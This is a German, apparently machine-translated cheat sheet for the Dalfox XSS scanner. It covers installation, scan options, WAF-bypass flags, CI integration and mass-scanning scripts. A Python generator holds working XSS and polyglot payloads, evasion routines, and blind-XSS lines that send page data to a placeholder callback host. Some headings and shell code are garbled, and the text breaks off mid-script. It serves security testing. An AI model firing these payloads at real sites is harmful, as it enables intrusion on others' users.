Dalfox Cheat Blatt
Überblick
Dalfox ist ein leistungsstarker, schneller und präziser XSS (Cross-Site Scripting) Scanner, der für moderne Webanwendungen konzipiert ist. Es verfügt über kontextbasierte Payload-Generation, intelligente DOM-Analyse und fortgeschrittene WAF Bypass-Techniken, so dass es ideal für automatisierte Sicherheitstests und manuelle Penetrationstests Workflows.
RECHT *Key Features: Context-aware XSS-Erkennung, DOM-basierte XSS-Analyse, WAF-Bypass-Techniken, Multi-Threading-Unterstützung, Custom Payload-Generation und umfassende Reporting-Funktionen.
Installation und Inbetriebnahme
Binärinstallation
```bash
Download latest release for Linux
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_linux_amd64.tar.gz tar -xzf dalfox_2.9.2_linux_amd64.tar.gz sudo mv dalfox /usr/local/bin/
Download for macOS
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_darwin_amd64.tar.gz tar -xzf dalfox_2.9.2_darwin_amd64.tar.gz sudo mv dalfox /usr/local/bin/
Download for Windows
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_windows_amd64.zip unzip dalfox_2.9.2_windows_amd64.zip
Move dalfox.exe to PATH
Verify installation
dalfox version
Check available options
dalfox help ```_
Zur Installation
```bash
Install via Go (requires Go 1.19+)
go install github.com/hahwul/dalfox/v2@latest
Verify installation
dalfox version
Update to latest version
go install github.com/hahwul/dalfox/v2@latest
Install specific version
go install github.com/hahwul/dalfox/v2@v2.9.2
Build from source
git clone https://github.com/hahwul/dalfox.git cd dalfox go build -o dalfox main.go sudo mv dalfox /usr/local/bin/ ```_
Docker Installation
```bash
Pull official Docker image
docker pull hahwul/dalfox:latest
Run Dalfox in Docker
docker run --rm hahwul/dalfox:latest version
Run with volume mount for output
docker run --rm -v $(pwd):/app hahwul/dalfox:latest url https://example.com
Create alias for easier usage
echo 'alias dalfox="docker run --rm -v $(pwd):/app hahwul/dalfox:latest"' >> ~/.bashrc source ~/.bashrc
Build custom Docker image
cat > Dockerfile << EOF FROM hahwul/dalfox:latest RUN apk add --no-cache curl jq COPY custom-payloads.txt /app/ EOF
docker build -t custom-dalfox . ```_
Installation des Paketmanagers
```bash
Homebrew (macOS/Linux)
brew install dalfox
Arch Linux (AUR)
yay -S dalfox-bin
Snap package
sudo snap install dalfox
APT (Ubuntu/Debian) - via GitHub releases
curl -s https://api.github.com/repos/hahwul/dalfox/releases/latest \ | grep "browser_download_url.linux_amd64.deb" \ | cut -d '"' -f 4 \ | wget -qi - sudo dpkg -i dalfox_.deb
RPM (CentOS/RHEL/Fedora)
curl -s https://api.github.com/repos/hahwul/dalfox/releases/latest \ | grep "browser_download_url.linux_amd64.rpm" \ | cut -d '"' -f 4 \ | wget -qi - sudo rpm -i dalfox_.rpm ```_
Grundlegende Verwendung und Befehle
Einzelne URL Scanning
```bash
Basic XSS scan
dalfox url https://example.com
Scan with custom user agent
dalfox url https://example.com --user-agent "Mozilla/5.0 Custom Agent"
Scan with authentication cookie
dalfox url https://example.com --cookie "session=abc123; auth=xyz789"
Scan with custom headers
dalfox url https://example.com --header "Authorization: Bearer token123"
Scan with proxy
dalfox url https://example.com --proxy http://127.0.0.1:8080
Scan with custom timeout
dalfox url https://example.com --timeout 30
Scan with verbose output
dalfox url https://example.com --verbose
Scan with debug information
dalfox url https://example.com --debug ```_
Viel Spaß! Scanning
```bash
Scan multiple URLs from file
echo -e "https://example.com\nhttps://test.com" > urls.txt dalfox file urls.txt
Scan URLs from stdin
echo "https://example.com" | dalfox pipe
Scan with threading
dalfox file urls.txt --worker 50
Scan with rate limiting
dalfox file urls.txt --delay 1000 # 1 second delay
Scan with custom output format
dalfox file urls.txt --format json
Scan and save results
dalfox file urls.txt --output results.txt
Scan with progress bar
dalfox file urls.txt --silence --format plain ```_
Parameter Entdeckung und Prüfung
```bash
Scan with parameter discovery
dalfox url https://example.com --mining-dict
Use custom parameter wordlist
dalfox url https://example.com --mining-dict-word custom-params.txt
Scan specific parameters
dalfox url "https://example.com?param1=test¶m;2=value"
Scan POST parameters
dalfox url https://example.com --data "username=admin&password;=test"
Scan with custom parameter injection
dalfox url https://example.com --custom-payload ""
Scan with parameter pollution
dalfox url https://example.com --param-pollution
Test all HTTP methods
dalfox url https://example.com --method GET,POST,PUT,DELETE ```_
Erweiterte XSS-Detektion
Context-Aware Scanning
```bash
Enable context analysis
dalfox url https://example.com --mining-dom
Deep DOM analysis
dalfox url https://example.com --mining-dom --deep-domxss
Scan for DOM-based XSS
dalfox url https://example.com --dom
Analyze JavaScript context
dalfox url https://example.com --js-analysis
Custom JavaScript payload testing
dalfox url https://example.com --custom-js "console.log('XSS')"
Test event handlers
dalfox url https://example.com --event-handlers
Scan with browser simulation
dalfox url https://example.com --browser-simulation ```_
WAF Bypass Techniken
```bash
Enable WAF bypass mode
dalfox url https://example.com --waf-evasion
Use encoding techniques
dalfox url https://example.com --encoder url,html,js
Custom encoding payloads
dalfox url https://example.com --custom-encoder "base64,hex"
Bypass with case variations
dalfox url https://example.com --case-variation
Use obfuscation techniques
dalfox url https://example.com --obfuscation
Fragment-based bypass
dalfox url https://example.com --fragment-bypass
Comment-based bypass
dalfox url https://example.com --comment-bypass
Unicode bypass techniques
dalfox url https://example.com --unicode-bypass ```_
Payload Anpassung
```bash
Use custom payload file
cat > custom-payloads.txt << EOF
dalfox url https://example.com --custom-payload-file custom-payloads.txt
Generate payloads for specific context
dalfox url https://example.com --payload-context attribute
Use polyglot payloads
dalfox url https://example.com --polyglot
Test with specific payload types
dalfox url https://example.com --payload-type script,img,svg,iframe
Custom payload with variables
dalfox url https://example.com --custom-payload ""
Blind XSS testing
dalfox url https://example.com --blind-xss --blind-url https://your-server.com/collect ```_
Automatisierung und Integration
CI/CD Integration
```bash
!/bin/bash
CI/CD script for automated XSS testing
set -e
TARGET_URL="$1" OUTPUT_DIR="$2" THRESHOLD="$3"
| if [ -z "$TARGET_URL" ] | | [ -z "$OUTPUT_DIR" ]; then |
echo "Usage: $0
THRESHOLD=${THRESHOLD:-0} # Default: fail on any XSS found
echo "Starting XSS scan with Dalfox..." echo "Target: $TARGET_URL" echo "Output directory: $OUTPUT_DIR" echo "Threshold: $THRESHOLD vulnerabilities"
mkdir -p "$OUTPUT_DIR"
Run Dalfox scan
dalfox url "$TARGET_URL" \ --format json \ --output "$OUTPUT_DIR/dalfox-results.json" \ --worker 20 \ --timeout 30 \ --mining-dict \ --dom \ --waf-evasion \ --verbose
Parse results
| VULN_COUNT=$(jq '.vulnerabilities | length' "$OUTPUT_DIR/dalfox-results.json" 2>/dev/null | | echo "0") |
echo "Found $VULN_COUNT XSS vulnerabilities"
Generate summary report
cat > "$OUTPUT_DIR/xss-summary.txt" << EOF XSS Security Scan Summary ======================== Date: $(date) Target: $TARGET_URL Scanner: Dalfox Vulnerabilities Found: $VULN_COUNT Threshold: $THRESHOLD
Status: $(if [ "$VULN_COUNT" -le "$THRESHOLD" ]; then echo "PASS"; else echo "FAIL"; fi) EOF
Generate HTML report
if command -v jq >/dev/null 2>&1; then python3 << 'PYTHON_EOF' import json import sys import os
output_dir = sys.argv[1] results_file = os.path.join(output_dir, "dalfox-results.json")
try: with open(results_file, 'r') as f: data = json.load(f)
vulnerabilities = data.get('vulnerabilities', [])
html_content = f"""
Dalfox XSS Scan Report
Target: {data.get('target', 'Unknown')}
Scan Date: {data.get('timestamp', 'Unknown')}
Vulnerabilities Found: {len(vulnerabilities)}
Vulnerability Details
""" if vulnerabilities: html_content += "| Type | URL | Parameter | Payload | Evidence |
|---|---|---|---|---|
| {vuln.get('type', 'XSS')} | {vuln.get('url', '')} | {vuln.get('parameter', '')} | {vuln.get('payload', '')} |
{vuln.get('evidence', '')} |
No XSS vulnerabilities detected.
" html_content += """"""
with open(os.path.join(output_dir, "dalfox-report.html"), 'w') as f:
f.write(html_content)
print(f"HTML report generated: {os.path.join(output_dir, 'dalfox-report.html')}")
except Exception as e: print(f"Error generating HTML report: {e}") PYTHON_EOF fi
Check threshold and exit
if [ "$VULN_COUNT" -gt "$THRESHOLD" ]; then echo "ERROR: Found $VULN_COUNT vulnerabilities, exceeds threshold of $THRESHOLD" exit 1 else echo "SUCCESS: Vulnerability count within acceptable threshold" exit 0 fi ```_
GitHub Aktionen Integration
```yaml
.github/workflows/xss-security-scan.yml
name: XSS Security Scan with Dalfox
on: push: branches: [ main, develop ] pull_request: branches: [ main ] schedule: - cron: '0 2 * * 1' # Weekly scan on Mondays at 2 AM
jobs: xss-scan: runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Install Dalfox
run: |
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_linux_amd64.tar.gz
tar -xzf dalfox_2.9.2_linux_amd64.tar.gz
sudo mv dalfox /usr/local/bin/
dalfox version
- name: Start application
run: |
# Start your web application here
npm start &
sleep 30 # Wait for application to start
- name: Run XSS scan
run: |
mkdir -p scan-results
# Scan main application endpoints
dalfox url http://localhost:3000 \
--format json \
--output scan-results/main-scan.json \
--worker 10 \
--timeout 30 \
--mining-dict \
--dom \
--waf-evasion
# Scan API endpoints
dalfox url http://localhost:3000/api \
--format json \
--output scan-results/api-scan.json \
--worker 10 \
--timeout 30 \
--data "param1=test¶m;2=value"
# Scan with authentication
dalfox url http://localhost:3000/dashboard \
--format json \
--output scan-results/auth-scan.json \
--cookie "session=${{ secrets.TEST_SESSION_COOKIE }}" \
--worker 10
- name: Process scan results
run: |
# Combine all scan results
jq -s 'add' scan-results/*.json > scan-results/combined-results.json
# Count vulnerabilities
VULN_COUNT=$(jq '.vulnerabilities | length' scan-results/combined-results.json)
echo "VULN_COUNT=$VULN_COUNT" >> $GITHUB_ENV
# Generate summary
echo "XSS vulnerabilities found: $VULN_COUNT" > scan-results/summary.txt
- name: Upload scan results
uses: actions/upload-artifact@v3
with:
name: xss-scan-results
path: scan-results/
- name: Comment PR with results
if: github.event_name == 'pull_request'
uses: actions/github-script@v6
with:
script: |
const fs = require('fs');
const summary = fs.readFileSync('scan-results/summary.txt', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: `## XSS Security Scan Results\n\n\`\`\`\n${summary}\n\`\`\``
});
- name: Fail if vulnerabilities found
run: |
if [ "$VULN_COUNT" -gt "0" ]; then
echo "XSS vulnerabilities detected! Check the scan results."
exit 1
fi
```_
Integration von Burp Suite
```python
Burp Suite extension for Dalfox integration
from burp import IBurpExtender, ITab, IHttpListener from java.awt import Component from java.awt import GridBagLayout, GridBagConstraints from javax.swing import JPanel, JButton, JTextArea, JScrollPane, JLabel import subprocess import json import threading
class BurpExtender(IBurpExtender, ITab, IHttpListener):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName("Dalfox Integration")
# Create UI
self._jPanel = JPanel(GridBagLayout())
# Add components
constraints = GridBagConstraints()
# Title
constraints.gridx = 0
constraints.gridy = 0
constraints.gridwidth = 2
self._jPanel.add(JLabel("Dalfox XSS Scanner Integration"), constraints)
# Scan button
constraints.gridx = 0
constraints.gridy = 1
constraints.gridwidth = 1
self._scanButton = JButton("Scan with Dalfox", actionPerformed=self.scanWithDalfox)
self._jPanel.add(self._scanButton, constraints)
# Results area
constraints.gridx = 0
constraints.gridy = 2
constraints.gridwidth = 2
constraints.fill = GridBagConstraints.BOTH
constraints.weightx = 1.0
constraints.weighty = 1.0
self._resultsArea = JTextArea(20, 80)
self._resultsArea.setEditable(False)
scrollPane = JScrollPane(self._resultsArea)
self._jPanel.add(scrollPane, constraints)
# Register as HTTP listener
callbacks.registerHttpListener(self)
# Add tab
callbacks.addSuiteTab(self)
print("Dalfox Integration extension loaded")
def getTabCaption(self):
return "Dalfox"
def getUiComponent(self):
return self._jPanel
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Auto-scan interesting requests
if messageIsRequest:
return
# Get request/response
request = messageInfo.getRequest()
response = messageInfo.getResponse()
# Parse URL
requestInfo = self._helpers.analyzeRequest(messageInfo)
url = str(requestInfo.getUrl())
# Check if response contains forms or parameters
responseString = self._helpers.bytesToString(response)
if "<form" in responseString.lower() or "input" in responseString.lower():
self.addToResults(f"Potential XSS target detected: {url}")
def scanWithDalfox(self, event):
# Get selected request from Burp
selectedMessages = self._callbacks.getSelectedMessages()
if not selectedMessages:
self.addToResults("No request selected. Please select a request in Burp.")
return
# Start scan in background thread
thread = threading.Thread(target=self.runDalfoxScan, args=(selectedMessages,))
thread.daemon = True
thread.start()
def runDalfoxScan(self, selectedMessages):
try:
for messageInfo in selectedMessages:
# Get request details
requestInfo = self._helpers.analyzeRequest(messageInfo)
url = str(requestInfo.getUrl())
self.addToResults(f"Starting Dalfox scan for: {url}")
# Prepare Dalfox command
cmd = [
"dalfox",
"url",
url,
"--format", "json",
"--worker", "5",
"--timeout", "10"
]
# Add cookies if present
headers = requestInfo.getHeaders()
for header in headers:
if header.lower().startswith("cookie:"):
cookie_value = header[7:].strip() # Remove "Cookie: "
cmd.extend(["--cookie", cookie_value])
break
# Run Dalfox
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True
)
stdout, stderr = process.communicate()
if process.returncode == 0:
try:
results = json.loads(stdout)
self.processDalfoxResults(url, results)
except json.JSONDecodeError:
self.addToResults(f"Scan completed for {url}, but no JSON output received")
else:
self.addToResults(f"Dalfox scan failed for {url}: {stderr}")
except Exception as e:
self.addToResults(f"Error running Dalfox scan: {str(e)}")
def processDalfoxResults(self, url, results):
vulnerabilities = results.get('vulnerabilities', [])
if vulnerabilities:
self.addToResults(f"XSS vulnerabilities found in {url}:")
for vuln in vulnerabilities:
vuln_type = vuln.get('type', 'XSS')
parameter = vuln.get('parameter', 'Unknown')
payload = vuln.get('payload', 'Unknown')
self.addToResults(f" - {vuln_type} in parameter '{parameter}'")
self.addToResults(f" Payload: {payload}")
else:
self.addToResults(f"No XSS vulnerabilities found in {url}")
def addToResults(self, text):
current_text = self._resultsArea.getText()
new_text = current_text + "\n" + text
self._resultsArea.setText(new_text)
self._resultsArea.setCaretPosition(len(new_text))
```_
Fortgeschrittene Techniken und Methoden
Entwicklung der Nutzlast
```python
!/usr/bin/env python3
Advanced payload generator for Dalfox
import random import string import base64 import urllib.parse import json
class DalfoxPayloadGenerator: def init(self): self.contexts = [ 'html', 'attribute', 'javascript', 'css', 'url', 'json' ]
self.encodings = [
'url', 'html', 'js', 'base64', 'hex', 'unicode'
]
self.evasion_techniques = [
'case_variation', 'comment_insertion', 'whitespace_variation',
'encoding_variation', 'tag_variation', 'event_variation'
]
def generate_context_aware_payloads(self, context='html'):
"""Generate payloads specific to injection context"""
payloads = []
if context == 'html':
payloads.extend([
'<script>alert("XSS")</script>',
'<img src=x onerror=alert("XSS")>',
'<svg onload=alert("XSS")>',
'<iframe src=javascript:alert("XSS")>',
'<body onload=alert("XSS")>',
'<input onfocus=alert("XSS") autofocus>',
'<select onfocus=alert("XSS") autofocus>',
'<textarea onfocus=alert("XSS") autofocus>',
'<keygen onfocus=alert("XSS") autofocus>',
'<video><source onerror=alert("XSS")>'
])
elif context == 'attribute':
payloads.extend([
'" onmouseover=alert("XSS") "',
'\' onmouseover=alert("XSS") \'',
'javascript:alert("XSS")',
'" onfocus=alert("XSS") autofocus="',
'\' onfocus=alert("XSS") autofocus=\'',
'" onload=alert("XSS") "',
'\' onload=alert("XSS") \'',
'" onerror=alert("XSS") "',
'\' onerror=alert("XSS") \''
])
elif context == 'javascript':
payloads.extend([
'alert("XSS")',
'confirm("XSS")',
'prompt("XSS")',
'console.log("XSS")',
'eval("alert(\\"XSS\\")")',
'Function("alert(\\"XSS\\")")()',
'setTimeout("alert(\\"XSS\\")", 0)',
'setInterval("alert(\\"XSS\\")", 0)',
'document.write("XSS")',
'window.location="javascript:alert(\\"XSS\\")"'
])
elif context == 'css':
payloads.extend([
'expression(alert("XSS"))',
'url("javascript:alert(\\"XSS\\")")',
'behavior:url("javascript:alert(\\"XSS\\")")',
'@import "javascript:alert(\\"XSS\\")"',
'background:url("javascript:alert(\\"XSS\\")")'
])
elif context == 'url':
payloads.extend([
'javascript:alert("XSS")',
'data:text/html,<script>alert("XSS")</script>',
'vbscript:alert("XSS")',
'livescript:alert("XSS")',
'mocha:alert("XSS")',
'feed:javascript:alert("XSS")',
'view-source:javascript:alert("XSS")'
])
elif context == 'json':
payloads.extend([
'{"xss":"<script>alert(\\"XSS\\")</script>"}',
'{"xss":"<img src=x onerror=alert(\\"XSS\\")>"}',
'{"xss":"javascript:alert(\\"XSS\\")"}',
'{"xss":"\\u003cscript\\u003ealert(\\"XSS\\")\\u003c/script\\u003e"}'
])
return payloads
def apply_encoding(self, payload, encoding='url'):
"""Apply various encoding techniques to payloads"""
if encoding == 'url':
return urllib.parse.quote(payload)
elif encoding == 'html':
return payload.replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''')
elif encoding == 'js':
return payload.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
elif encoding == 'base64':
return base64.b64encode(payload.encode()).decode()
elif encoding == 'hex':
return ''.join([hex(ord(c))[2:] for c in payload])
elif encoding == 'unicode':
return ''.join([f'\\u{ord(c):04x}' for c in payload])
return payload
def apply_evasion(self, payload, technique='case_variation'):
"""Apply WAF evasion techniques"""
if technique == 'case_variation':
result = ''
for char in payload:
if char.isalpha():
result += char.upper() if random.choice([True, False]) else char.lower()
else:
result += char
return result
elif technique == 'comment_insertion':
# Insert HTML comments
return payload.replace('<script>', '<script/**/>')
elif technique == 'whitespace_variation':
# Use various whitespace characters
whitespace_chars = [' ', '\t', '\n', '\r', '\f', '\v']
return payload.replace(' ', random.choice(whitespace_chars))
elif technique == 'tag_variation':
# Use alternative tags
tag_alternatives = {
'script': ['SCRIPT', 'Script', 'sCrIpT'],
'img': ['IMG', 'Img', 'iMg'],
'svg': ['SVG', 'Svg', 'sVg']
}
result = payload
for tag, alternatives in tag_alternatives.items():
if tag in payload.lower():
result = result.replace(tag, random.choice(alternatives))
return result
elif technique == 'event_variation':
# Use alternative event handlers
event_alternatives = {
'onload': ['onLoad', 'ONLOAD', 'OnLoad'],
'onerror': ['onError', 'ONERROR', 'OnError'],
'onclick': ['onClick', 'ONCLICK', 'OnClick']
}
result = payload
for event, alternatives in event_alternatives.items():
if event in payload.lower():
result = result.replace(event, random.choice(alternatives))
return result
return payload
def generate_polyglot_payloads(self):
"""Generate polyglot payloads that work in multiple contexts"""
polyglots = [
'javascript:/*--></title></style></textarea></script></xmp><svg/onload=\'+/"/+/onmouseover=1/+/[*/[]/+alert(1)//\'>',
'"><img src=x onerror=alert(1)>',
'\';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>',
'\'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>\'">',
'jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//',
'<svg/onload=alert(1)>',
'<img src=x onerror=alert(1)>',
'<iframe src=javascript:alert(1)>',
'<body onload=alert(1)>',
'<script>alert(1)</script>'
]
return polyglots
def generate_blind_xss_payloads(self, callback_url):
"""Generate payloads for blind XSS testing"""
payloads = [
f'<script>fetch("{callback_url}?xss="+document.domain)</script>',
f'<img src=x onerror=fetch("{callback_url}?xss="+document.domain)>',
f'<svg onload=fetch("{callback_url}?xss="+document.domain)>',
f'<script>new Image().src="{callback_url}?xss="+document.domain</script>',
f'<script>document.location="{callback_url}?xss="+document.domain</script>',
f'<script>navigator.sendBeacon("{callback_url}", document.domain)</script>',
f'<script>eval(atob("ZmV0Y2goIi4uLiIp")).replace("...", "{callback_url}?xss="+document.domain)</script>'
]
return payloads
def save_payloads_to_file(self, payloads, filename):
"""Save generated payloads to file for use with Dalfox"""
with open(filename, 'w') as f:
for payload in payloads:
f.write(payload + '\n')
print(f"Saved {len(payloads)} payloads to {filename}")
def generate_comprehensive_payload_set(self, callback_url=None):
"""Generate comprehensive set of payloads for all contexts"""
all_payloads = []
# Generate context-specific payloads
for context in self.contexts:
context_payloads = self.generate_context_aware_payloads(context)
all_payloads.extend(context_payloads)
# Add polyglot payloads
all_payloads.extend(self.generate_polyglot_payloads())
# Add blind XSS payloads if callback URL provided
if callback_url:
all_payloads.extend(self.generate_blind_xss_payloads(callback_url))
# Apply various evasion techniques
evasion_payloads = []
for payload in all_payloads[:20]: # Apply to first 20 payloads
for technique in self.evasion_techniques:
evasion_payloads.append(self.apply_evasion(payload, technique))
all_payloads.extend(evasion_payloads)
# Apply various encodings
encoded_payloads = []
for payload in all_payloads[:10]: # Apply to first 10 payloads
for encoding in self.encodings:
encoded_payloads.append(self.apply_encoding(payload, encoding))
all_payloads.extend(encoded_payloads)
# Remove duplicates
all_payloads = list(set(all_payloads))
return all_payloads
Usage example
if name == "main": generator = DalfoxPayloadGenerator()
# Generate comprehensive payload set
payloads = generator.generate_comprehensive_payload_set("https://your-callback-server.com/collect")
# Save to file
generator.save_payloads_to_file(payloads, "custom-dalfox-payloads.txt")
print(f"Generated {len(payloads)} unique payloads")
# Example usage with Dalfox
print("\nTo use with Dalfox:")
print("dalfox url https://target.com --custom-payload-file custom-dalfox-payloads.txt")
```_
Maß Scanning Automation
```bash
!/bin/bash
Mass XSS scanning script with Dalfox
set -e
TARGETS_FILE="$1" OUTPUT_DIR="$2" THREADS="$3" DELAY="$4"
| if [ -z "$TARGETS_FILE" ] | | [ -z "$OUTPUT_DIR" ]; then |
echo "Usage: $0
THREADS=${THREADS:-10} DELAY=${DELAY:-500}
echo "Starting mass XSS scanning with Dalfox" echo "Targets file: $TARGETS_FILE" echo "Output directory: $OUTPUT_DIR" echo "Threads: $THREADS" echo "Delay: ${DELAY}ms"
mkdir -p "$OUTPUT_DIR"
Validate targets file
if [ ! -f "$TARGETS_FILE" ]; then echo "Error: Targets file not found: $TARGETS_FILE" exit 1 fi
TARGET_COUNT=$(wc -l < "$TARGETS_FILE") echo "Total targets: $TARGET_COUNT"
Create scan configuration
cat > "$OUTPUT_DIR/scan-config.json" << EOF { "scan_date": "$(date -Iseconds)", "targets_file": "$TARGETS_FILE", "target_count": $TARGET_COUNT, "threads": $THREADS, "delay_ms": $DELAY, | "dalfox_version": "$(dalfox version 2>/dev/null | | echo 'unknown')" | } EOF
Function to scan single target
scan_target() { local target="$1" local output_dir="$2" local delay="$3"
# Create safe filename
| local safe_filename=$(echo "$target" | sed 's | https\?:// | | g' | sed 's | [^a-zA-Z0-9.-] | _ | g') | local output_file="$output_dir/${safe_filename}.json"
echo "Scanning: $target"
# Run Dalfox scan
timeout 300 dalfox url "$target" \
--format json \
--output "$output_file" \
--worker 5 \
--timeout 30 \
--delay "$delay" \
--mining-dict \
--dom \
--waf-evasion \
--silence \
| 2>/dev/null | | { | echo "Scan failed or timed out for: $target" echo '{"error": "scan_failed", "target": "'$target'", "timestamp": "'$(date -Iseconds)'"}' > "$output_file" }
# Add metadata to result
if [ -f "$output_file" ]; then
# Create temporary file with metadata
| jq '. + {"scan_metadata": {"target": "'$target'", "scan_time": "'$(date -Iseconds)'"}}' "$output_file" > "$output_file.tmp" 2>/dev/null | | { | # If jq fails, create basic JSON structure echo '{"target": "'$target'", "scan_time": "'$(date -Iseconds)'", "error": "json_parse_failed"}' > "$output_file.tmp" } mv "$output_file.tmp" "$output_file" fi }
export -f scan_target
Run parallel scans
echo "Starting parallel scans..." cat "$TARGETS_FILE" | xargs -I {} -P "$THREADS" bash -c 'scan_target "$@"' _ {} "$OUTPUT_DIR" "$DELAY"
echo "Scanning completed. Processing results..."
Combine all results
echo "Combining scan results..." find "$OUTPUT_DIR" -name "*.json" -type f | while read -r file; do if [ -s "$file" ]; then # Check if file is not empty cat "$file" echo "," fi | done | sed '$ s/,$//' | sed '1i[' | sed '$a]' > "$OUTPUT_DIR/combined-results.json" |
Generate summary statistics
python3 << 'PYTHON_EOF' import json import sys import os from collections import defaultdict
output_dir = sys.argv[1] combined_file = os.path.join(output_dir, "combined-results.json")
try: with open(combined_file, 'r') as f: results = json.load(f)
stats = {
"total_targets": len(results),
"successful_scans": 0,
"failed_scans": 0,
"total_vulnerabilities": 0,
"vulnerable_targets": 0,
"vulnerability_types": defaultdict(int),
"targets_with_vulns": []
}
for result in results:
if "error" in result:
stats["failed_scans"] += 1
continue
stats["successful_scans"] += 1
vulnerabilities = result.get("vulnerabilities", [])
if vulnerabilities:
stats["vulnerable_targets"] += 1
stats["targets_with_vulns"].append({
"target": result.get("target", "unknown"),
"vuln_count": len(vulnerabilities)
})
stats["total_vulnerabilities"] += len(vulnerabilities)
for vuln in vulnerabilities:
vuln_type = vuln.get("type", "unknown")
stats["vulnerability_types"][vuln_type] += 1
# Convert defaultdict to regular dict for JSON serialization
stats["vulnerability_types"] = dict(stats["vulnerability_types"])
# Save statistics
with open(os.path.join(output_dir, "scan-statistics.json"), 'w') as f:
json.dump(stats, f, indent=2)
# Generate text summary
summary_text = f"""
XSS Mass Scanning Summary
Scan Date: {results[0].get('scan_metadata', {}).get('scan_time', 'unknown') if results else 'unknown'} Total Targets: {stats['total_targets']} Successful Scans: {stats['successful_scans']} Failed Scans: {stats['failed_scans']} Success Rate: {(stats['successful_scans'] / stats['total_targets'] * 100):.1f}%
Vulnerability Summary: - Total Vulnerabilities: {stats['total_vulnerabilities']} - Vulnerable Targets: {stats['vulnerable_targets']} - Vulnerability Rate: {(stats['vulnerable_targets'] / stats['successful_scans'] * 100):.1f}%
Vulnerability Types: """
for vuln_type, count in stats["vulnerability_types"].items():
summary_text += f"- {vuln_type}: {count}\n"
summary_text += "\nMost Vulnerable Targets:\n"
sorted_targets = sorted(stats["targets_with_vulns"], key=lambda x: x["vuln_count"], reverse=True)
for target in sorted_targets[:10]:
summary_text += f"- {target['target']}: {target['vuln_count']} vulnerabilities\n"
with open(os.path.join(output_dir, "scan-summary.txt"), 'w') as f:
f.write(summary_text)
print("Scan statistics generated successfully")
print(f"Total vulnerabilities found: {stats['total_vulnerabilities']}")
print(f"Vulnerable targets: {stats['vulnerable_targets']}/{stats['successful_scans']}")
except Exception as e: print(f"Error processing results: {e}") sys.exit(1) PYTHON_EOF
echo "Mass scanning completed!" echo "Results saved to: $OUTPUT_DIR" echo "Summary: $OUTPUT_DIR/scan-summary.txt" echo "Statistics: $OUTPUT_DIR/scan-statistics.json" echo "Combined results: $OUTPUT_DIR/combined-results.json" ```_
Leistungsoptimierung und Fehlerbehebung
Leistung Tuning
```bash
Optimize Dalfox for different scenarios
High-speed scanning (less accuracy)
dalfox url https://example.com \ --worker 50 \ --timeout 5 \ --delay 100 \ --skip-mining \ --skip-dom \ --format plain
Thorough scanning (high accuracy)
dalfox url https://example.com \ --worker 10 \ --timeout 60 \ --delay 2000 \ --mining-dict \ --mining-dom \ --deep-domxss \ --waf-evasion \ --format json
Memory-efficient scanning for large targets
dalfox file large-targets.txt \ --worker 5 \ --timeout 30 \ --delay 1000 \ --batch-size 100 \ --format plain
Network-optimized scanning
dalfox url https://example.com \ --worker 20 \ --timeout 15 \ --delay 500 \ --retry 2 \ --proxy http://127.0.0.1:8080
Resource monitoring during scans
!/bin/bash
monitor_dalfox_performance() { local target="$1" local output_file="performance-$(date +%s).log"
echo "Starting performance monitoring for Dalfox scan"
echo "Target: $target"
echo "Log file: $output_file"
# Start monitoring in background
{
echo "Timestamp,CPU%,Memory(MB),Network(KB/s)"
while true; do
if pgrep -f "dalfox" > /dev/null; then
local cpu=$(ps -p $(pgrep -f "dalfox") -o %cpu --no-headers | awk '{sum+=$1} END {print sum}')
local mem=$(ps -p $(pgrep -f "dalfox") -o rss --no-headers | awk '{sum+=$1} END {print sum/1024}')
| local net=$(cat /proc/net/dev | grep -E "(eth0 | wlan0)" | awk '{print ($2+$10)/1024}') | echo "$(date +%s),$cpu,$mem,$net" fi sleep 5 done } > "$output_file" &
local monitor_pid=$!
# Run Dalfox scan
dalfox url "$target" \
--worker 20 \
--timeout 30 \
--mining-dict \
--dom \
--format json \
--output "scan-results-$(date +%s).json"
# Stop monitoring
kill $monitor_pid 2>/dev/null
echo "Performance monitoring completed: $output_file"
}
Usage
monitor_dalfox_performance "https://example.com" ```_
Probleme bei der Fehlerbehebung
```bash
Debug connection issues
dalfox url https://example.com --debug --verbose
Test with different user agents
dalfox url https://example.com --user-agent "Mozilla/5.0 (compatible; DalfoxBot/1.0)"
Bypass SSL certificate issues
dalfox url https://example.com --ignore-ssl
Handle rate limiting
dalfox url https://example.com --delay 5000 --retry 3
Debug payload issues
dalfox url https://example.com --custom-payload "" --debug
Test proxy configuration
dalfox url https://example.com --proxy http://127.0.0.1:8080 --debug
Verify installation
dalfox version dalfox help
Check for updates
go install github.com/hahwul/dalfox/v2@latest
Common error solutions
troubleshoot_dalfox() { echo "Dalfox Troubleshooting Guide" echo "==========================="
# Check if Dalfox is installed
if ! command -v dalfox &> /dev/null; then
echo "❌ Dalfox not found in PATH"
echo "Solution: Install Dalfox using one of the installation methods"
return 1
fi
echo "✅ Dalfox found: $(which dalfox)"
echo "Version: $(dalfox version)"
# Check network connectivity
